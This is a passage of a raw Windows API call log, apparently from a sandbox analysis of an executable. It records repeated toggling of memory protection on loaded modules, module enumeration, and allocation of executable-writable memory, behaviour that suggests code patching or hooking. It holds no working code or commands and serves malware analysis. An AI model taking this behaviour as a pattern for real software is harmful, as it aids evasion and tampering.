BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.642] GetCurrentProcess () returned 0xffffffff [0081.642] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4182c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.642] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41850, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.642] GetCurrentProcess () returned 0xffffffff [0081.642] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41850, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.643] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41860, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.643] GetCurrentProcess () returned 0xffffffff [0081.643] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41860, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.643] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41864, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.644] GetCurrentProcess () returned 0xffffffff [0081.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41864, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41868, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.644] GetCurrentProcess () returned 0xffffffff [0081.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41868, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.645] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4186c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.645] GetCurrentProcess () returned 0xffffffff [0081.645] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4186c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.645] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41870, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.646] GetCurrentProcess () returned 0xffffffff [0081.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41870, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.646] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.647] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7596101c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75961000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.647] GetCurrentProcess () returned 0xffffffff [0081.647] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7596101c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75961000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.648] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75961074, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75961000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.648] GetCurrentProcess () returned 0xffffffff [0081.648] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75961074, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75961000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.648] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75961088, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75961000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.649] GetCurrentProcess () returned 0xffffffff [0081.649] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75961088, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75961000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.649] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.650] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0208, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.650] GetCurrentProcess () returned 0xffffffff [0081.650] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0208, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.650] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0218, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.651] GetCurrentProcess () returned 0xffffffff [0081.651] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0218, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.651] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0328, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.651] GetCurrentProcess () returned 0xffffffff [0081.651] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0328, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.652] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0330, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.652] GetCurrentProcess () returned 0xffffffff [0081.652] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0330, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.652] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.653] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c0018, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.654] GetCurrentProcess () returned 0xffffffff [0081.654] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c0018, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.654] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c0020, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.654] GetCurrentProcess () returned 0xffffffff [0081.654] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c0020, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.654] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c00ac, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.655] GetCurrentProcess () returned 0xffffffff [0081.655] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c00ac, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.655] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c00b4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.656] GetCurrentProcess () returned 0xffffffff [0081.656] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755c00b4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.656] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.657] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755a1060, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755a1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.657] GetCurrentProcess () returned 0xffffffff [0081.657] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755a1060, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755a1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.658] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755a109c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755a1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.658] GetCurrentProcess () returned 0xffffffff [0081.658] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755a109c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755a1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.658] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755a10a4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755a1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.658] GetCurrentProcess () returned 0xffffffff [0081.659] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x755a10a4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x755a1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.659] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.660] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1238, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.660] GetCurrentProcess () returned 0xffffffff [0081.660] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1238, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.661] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1258, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.661] GetCurrentProcess () returned 0xffffffff [0081.661] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1258, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.661] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1260, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.662] GetCurrentProcess () returned 0xffffffff [0081.662] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1260, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.662] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1268, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.662] GetCurrentProcess () returned 0xffffffff [0081.662] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1268, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.663] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d12c4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.663] GetCurrentProcess () returned 0xffffffff [0081.663] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d12c4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.663] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d12c8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.664] GetCurrentProcess () returned 0xffffffff [0081.664] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d12c8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.664] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d12cc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.664] GetCurrentProcess () returned 0xffffffff [0081.664] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d12cc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.665] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1300, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.665] GetCurrentProcess () returned 0xffffffff [0081.665] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1300, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.665] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1308, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.666] GetCurrentProcess () returned 0xffffffff [0081.666] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1308, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.666] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d132c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.667] GetCurrentProcess () returned 0xffffffff [0081.667] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d132c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.667] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1384, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.667] GetCurrentProcess () returned 0xffffffff [0081.667] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1384, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.668] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x775d1390, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x775d1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.668] GetCurrentProcess () returned 0xffffffff [0081.669] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.672] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.675] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.680] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.683] GetCurrentProcess () returned 0xffffffff [0081.685] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.689] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.692] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.695] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.698] GetCurrentProcess () returned 0xffffffff [0081.699] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.700] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.704] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.705] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 0 [0081.706] CloseHandle (hObject=0x124) returned 1 [0081.706] GetLastError () returned 0x12 [0081.707] SetLastError (dwErrCode=0x12) [0081.755] GetLastError () returned 0x12 [0081.755] SetLastError (dwErrCode=0x12) [0081.755] GetLastError () returned 0x12 [0081.755] SetLastError (dwErrCode=0x12) [0081.755] VirtualAlloc (lpAddress=0x3324000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3324000 [0081.758] VirtualFree (lpAddress=0x3324000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0081.759] GetLastError () returned 0x12 [0081.759] SetLastError (dwErrCode=0x12) [0081.759] GetLastError () returned 0x12 [0081.759] SetLastError (dwErrCode=0x12) [0081.759] GetLastError () returned 0x12 [0081.759] SetLastError (dwErrCode=0x12) [0081.810] GetLastError () returned 0x12 [0081.810] SetLastError (dwErrCode=0x12) [0081.810] GetLastError () returned 0x12 [0081.810] SetLastError (dwErrCode=0x12) [0081.810] GetLastError () returned 0x12 [0081.810] SetLastError (dwErrCode=0x12) [0081.858] VirtualAlloc (lpAddress=0x3324000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3324000 [0081.861] VirtualFree (lpAddress=0x3324000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0081.863] GetLastError () returned 0x12 [0081.863] SetLastError (dwErrCode=0x12) [0081.863] GetLastError () returned 0x12 [0081.863] SetLastError (dwErrCode=0x12) [0081.863] GetLastError () returned 0x12 [0081.863] SetLastError (dwErrCode=0x12) [0081.863] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x5000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0081.863] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0081.863] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0081.864] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0081.864] GetLastError () returned 0x12 [0081.864] SetLastError (dwErrCode=0x12) [0081.864] GetLastError () returned 0x12 [0081.864] SetLastError (dwErrCode=0x12) [0081.864] GetLastError () returned 0x12 [0081.864] SetLastError (dwErrCode=0x12) [0081.913] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x5000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0081.913] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, 